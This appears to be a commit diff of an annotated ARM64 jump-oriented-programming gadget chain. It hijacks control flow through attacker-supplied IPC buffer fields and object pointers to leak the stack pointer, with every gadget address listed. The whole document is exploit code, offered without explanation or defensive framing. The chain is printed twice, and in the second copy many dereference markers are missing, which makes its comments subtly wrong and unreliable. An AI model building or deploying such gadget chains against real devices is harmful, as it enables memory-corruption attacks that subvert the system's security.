kgsws · November 11, 2017 01:56
diff --git a/getstack.jop b/getstack.jop
 SpLeak:
   0x0000003d00017d80:	ldr	x8, [x23]	// X8 = IPC (0x24)
   0x0000003d00017d84:	ldr	x8, [x8, #56]	// ipc[15] + ipc[16]
   0x0000003d00017d88:	mov	x0, x23		// X0 = ptr 24
   0x0000003d00017d8c:	blr	x8
 -1------
   0x0000003d0000f194:	ldr	x8, [x0]	// X8 = IPC (0x24)
   0x0000003d0000f198:	ldr	x2, [x8, #72]	// ipc[19] + ipc[20]
   0x0000003d0000f19c:	br	x2
 -2------
   0x0000003d0003f8a8:	ldr	x0, [x8, #16]	// X0 = ipc[5] + ipc[6]; pdmEntry
   0x0000003d0003f8ac:	ldr	x8, [x0]	// X8 = *(pdmEntry+0)
   0x0000003d0003f8b0:	ldr	x8, [x8, #48]	// X8 = *(*(pdmEntry+0)+48)
   0x0000003d0003f8b4:	blr	x8
 -3------
   0x0000003d000033d0:	ldr	x8, [x0]	// X8 = *(pdmEntry+0)
   0x0000003d000033d4:	ldr	x8, [x8, #16]	// X8 = *(*(pdmEntry+0)+16)
   0x0000003d000033d8:	blr	x8
 -4------ called
   0x0000003d000026cc:	sub	sp, sp, #0xd0	// STACK MOVE
   0x0000003d000026d0:	stp	x26, x25, [sp, #128]
   0x0000003d000026d4:	stp	x24, x23, [sp, #144]
   0x0000003d000026d8:	stp	x22, x21, [sp, #160]
   0x0000003d000026dc:	stp	x20, x19, [sp, #176]
   0x0000003d000026e0:	stp	x29, x30, [sp, #192]
   0x0000003d000026e4:	add	x29, sp, #0xc0
   0x0000003d000026e8:	ldr	x19, [x0, #8]	// X19 = *(pdmEntry+8)
   0x0000003d000026ec:	ldr	x8, [x19]	// X8 = *(*(pdmEntry+8)+0)
   0x0000003d000026f0:	ldr	x8, [x8]	// X8 = (*(*(pdmEntry+8)+0)+0)
   0x0000003d000026f4:	ldr	w26, [x0, #16]
   0x0000003d000026f8:	mov	x0, x19		// X0 = *(pdmEntry+8)
   0x0000003d000026fc:	mov	w22, w3
   0x0000003d00002700:	mov	x24, x2
   0x0000003d00002704:	mov	x25, x1
   0x0000003d00002708:	blr	x8
 -5------
   0x0000003d0004de98:	ldr	x0, [x19, #8]	// X0 = *(*(pdmEntry+8)+8)
   0x0000003d0004de9c:	ldr	x9, [x19, #32]	// X9 = *(*(pdmEntry+8)+32)
   0x0000003d0004dea0:	sub	x1, x9, x0
   0x0000003d0004dea4:	ldr	x8, [x19, #48]	// X8 = *(*(pdmEntry+8)+48)
   0x0000003d0004dea8:	blr	x8
 -6------
   0x0000003d0002d8d4:	ldr	x22, [x0, #8]	// X22 = *(*(*(pdmEntry+8)+8)+8)
   0x0000003d0002d8d8:	ldr	x21, [x22, #72]	// X21 = *(*(*(*(pdmEntry+8)+8)+8)+72)
   0x0000003d0002d8dc:	mov	x20, x2
   0x0000003d0002d8e0:	mov	x19, x1
   0x0000003d0002d8e4:	str	x21, [sp, #32]
   0x0000003d0002d8e8:	cbz	x21, 0x3d0002d8fc
   0x0000003d0002d8ec:	ldr	x8, [x21]	// X8 = *(*(*(*(*(pdmEntry+8)+8)+8)+72)+0)
   0x0000003d0002d8f0:	ldr	x8, [x8]	// X8 = *(*(*(*(*(*(pdmEntry+8)+8)+8)+72)+0)+0)
   0x0000003d0002d8f4:	mov	x0, x21		// X0 = *(*(*(*(pdmEntry+8)+8)+8)+72)
   0x0000003d0002d8f8:	blr	x8
 -7------
   0x0000003d00011b38:	ldr	x8, [x22]	// X8 = *(*(*(*(pdmEntry+8)+8)+8)+0)
   0x0000003d00011b3c:	ldr	x8, [x8, #200]	// X8 = *(*(*(*(*(pdmEntry+8)+8)+8)+0)+200)
   0x0000003d00011b40:	sub	x1, x29, #0x28	// X1 = SP leak; (SP + 0x98)
   0x0000003d00011b44:	add	x2, sp, #0x18	// X2 = SP leak; (SP + 0x18)
   0x0000003d00011b48:	mov	x0, x22		// X0 = *(*(*(pdmEntry+8)+8)+8)
   0x0000003d00011b4c:	blr	x8
 -8------
   0x0000003d0004a3a8:	str	x1, [x22, #288]	// *(*(*(*(pdmEntry+8)+8)+8)+288) = X1
   0x0000003d0004a3ac:	cbz	x0, 0x3d0004a3c0
   0x0000003d0004a3b0:	ldr	x8, [x0]	// X8 = *(*(*(*(pdmEntry+8)+8)+8)+0)
   0x0000003d0004a3b4:	ldr	x8, [x8, #8]	// X8 = *(*(*(*(*(pdmEntry+8)+8)+8)+0)+8)
   0x0000003d0004a3b8:	blr	x8
 -9------
   0x0000003d00002850:	ldp	x29, x30, [sp, #192]
   0x0000003d00002854:	ldp	x20, x19, [sp, #176]
   0x0000003d00002858:	ldp	x22, x21, [sp, #160]
   0x0000003d0000285c:	ldp	x24, x23, [sp, #144]
   0x0000003d00002860:	ldp	x26, x25, [sp, #128]
   0x0000003d00002864:	add	sp, sp, #0xd0	// STACK BACK
   0x0000003d00002868:	ret
 -RET---- returned
   0x0000003d000033dc:	ldr	x8, [x0]	// X8 = *(*(*(*(pdmEntry+8)+8)+8)+0)
   0x0000003d000033e0:	ldr	x8, [x8]	// X8 = *(*(*(*(*(pdmEntry+8)+8)+8)+0)+0)
   0x0000003d000033e4:	blr	x8
 -10-----
   0x0000003d00035180:	mov	x0, x2		// return X2; SP leak
   0x0000003d00035184:	ldr	x8, [x9, #40]	// X8 = *(*(*(pdmEntry+8)+32)+40)
   0x0000003d00035188:	mov	x2, x19
   0x0000003d0003518c:	mov	x3, x19
   0x0000003d00035190:	mov	w5, wzr
   0x0000003d00035194:	blr	x8
	SpLeak:
	0x0000003d00017d80: ldr x8, [x23] // X8 = IPC (0x24)
	0x0000003d00017d84: ldr x8, [x8, #56] // ipc[15] + ipc[16]
	0x0000003d00017d88: mov x0, x23 // X0 = ptr 24
	0x0000003d00017d8c: blr x8
	-1------
	0x0000003d0000f194: ldr x8, [x0] // X8 = IPC (0x24)
	0x0000003d0000f198: ldr x2, [x8, #72] // ipc[19] + ipc[20]
	0x0000003d0000f19c: br x2
	-2------
	0x0000003d0003f8a8: ldr x0, [x8, #16] // X0 = ipc[5] + ipc[6]; pdmEntry
	0x0000003d0003f8ac: ldr x8, [x0] // X8 = *(pdmEntry+0)
	0x0000003d0003f8b0: ldr x8, [x8, #48] // X8 = ((pdmEntry+0)+48)
	0x0000003d0003f8b4: blr x8
	-3------
	0x0000003d000033d0: ldr x8, [x0] // X8 = *(pdmEntry+0)
	0x0000003d000033d4: ldr x8, [x8, #16] // X8 = ((pdmEntry+0)+16)
	0x0000003d000033d8: blr x8
	-4------ called
	0x0000003d000026cc: sub sp, sp, #0xd0 // STACK MOVE
	0x0000003d000026d0: stp x26, x25, [sp, #128]
	0x0000003d000026d4: stp x24, x23, [sp, #144]
	0x0000003d000026d8: stp x22, x21, [sp, #160]
	0x0000003d000026dc: stp x20, x19, [sp, #176]
	0x0000003d000026e0: stp x29, x30, [sp, #192]
	0x0000003d000026e4: add x29, sp, #0xc0
	0x0000003d000026e8: ldr x19, [x0, #8] // X19 = *(pdmEntry+8)
	0x0000003d000026ec: ldr x8, [x19] // X8 = ((pdmEntry+8)+0)
	0x0000003d000026f0: ldr x8, [x8] // X8 = (((pdmEntry+8)+0)+0)
	0x0000003d000026f4: ldr w26, [x0, #16]
	0x0000003d000026f8: mov x0, x19 // X0 = *(pdmEntry+8)
	0x0000003d000026fc: mov w22, w3
	0x0000003d00002700: mov x24, x2
	0x0000003d00002704: mov x25, x1
	0x0000003d00002708: blr x8
	-5------
	0x0000003d0004de98: ldr x0, [x19, #8] // X0 = ((pdmEntry+8)+8)
	0x0000003d0004de9c: ldr x9, [x19, #32] // X9 = ((pdmEntry+8)+32)
	0x0000003d0004dea0: sub x1, x9, x0
	0x0000003d0004dea4: ldr x8, [x19, #48] // X8 = ((pdmEntry+8)+48)
	0x0000003d0004dea8: blr x8
	-6------
	0x0000003d0002d8d4: ldr x22, [x0, #8] // X22 = ((*(pdmEntry+8)+8)+8)
	0x0000003d0002d8d8: ldr x21, [x22, #72] // X21 = ((((pdmEntry+8)+8)+8)+72)
	0x0000003d0002d8dc: mov x20, x2
	0x0000003d0002d8e0: mov x19, x1
	0x0000003d0002d8e4: str x21, [sp, #32]
	0x0000003d0002d8e8: cbz x21, 0x3d0002d8fc
	0x0000003d0002d8ec: ldr x8, [x21] // X8 = ((((*(pdmEntry+8)+8)+8)+72)+0)
	0x0000003d0002d8f0: ldr x8, [x8] // X8 = ((((((pdmEntry+8)+8)+8)+72)+0)+0)
	0x0000003d0002d8f4: mov x0, x21 // X0 = ((((pdmEntry+8)+8)+8)+72)
	0x0000003d0002d8f8: blr x8
	-7------
	0x0000003d00011b38: ldr x8, [x22] // X8 = ((((pdmEntry+8)+8)+8)+0)
	0x0000003d00011b3c: ldr x8, [x8, #200] // X8 = ((((*(pdmEntry+8)+8)+8)+0)+200)
	0x0000003d00011b40: sub x1, x29, #0x28 // X1 = SP leak; (SP + 0x98)
	0x0000003d00011b44: add x2, sp, #0x18 // X2 = SP leak; (SP + 0x18)
	0x0000003d00011b48: mov x0, x22 // X0 = ((*(pdmEntry+8)+8)+8)
	0x0000003d00011b4c: blr x8
	-8------
	0x0000003d0004a3a8: str x1, [x22, #288] // ((((pdmEntry+8)+8)+8)+288) = X1
	0x0000003d0004a3ac: cbz x0, 0x3d0004a3c0
	0x0000003d0004a3b0: ldr x8, [x0] // X8 = ((((pdmEntry+8)+8)+8)+0)
	0x0000003d0004a3b4: ldr x8, [x8, #8] // X8 = ((((*(pdmEntry+8)+8)+8)+0)+8)
	0x0000003d0004a3b8: blr x8
	-9------
	0x0000003d00002850: ldp x29, x30, [sp, #192]
	0x0000003d00002854: ldp x20, x19, [sp, #176]
	0x0000003d00002858: ldp x22, x21, [sp, #160]
	0x0000003d0000285c: ldp x24, x23, [sp, #144]
	0x0000003d00002860: ldp x26, x25, [sp, #128]
	0x0000003d00002864: add sp, sp, #0xd0 // STACK BACK
	0x0000003d00002868: ret
	-RET---- returned
	0x0000003d000033dc: ldr x8, [x0] // X8 = ((((pdmEntry+8)+8)+8)+0)
	0x0000003d000033e0: ldr x8, [x8] // X8 = ((((*(pdmEntry+8)+8)+8)+0)+0)
	0x0000003d000033e4: blr x8
	-10-----
	0x0000003d00035180: mov x0, x2 // return X2; SP leak
	0x0000003d00035184: ldr x8, [x9, #40] // X8 = ((*(pdmEntry+8)+32)+40)
	0x0000003d00035188: mov x2, x19
	0x0000003d0003518c: mov x3, x19
	0x0000003d00035190: mov w5, wzr
	0x0000003d00035194: blr x8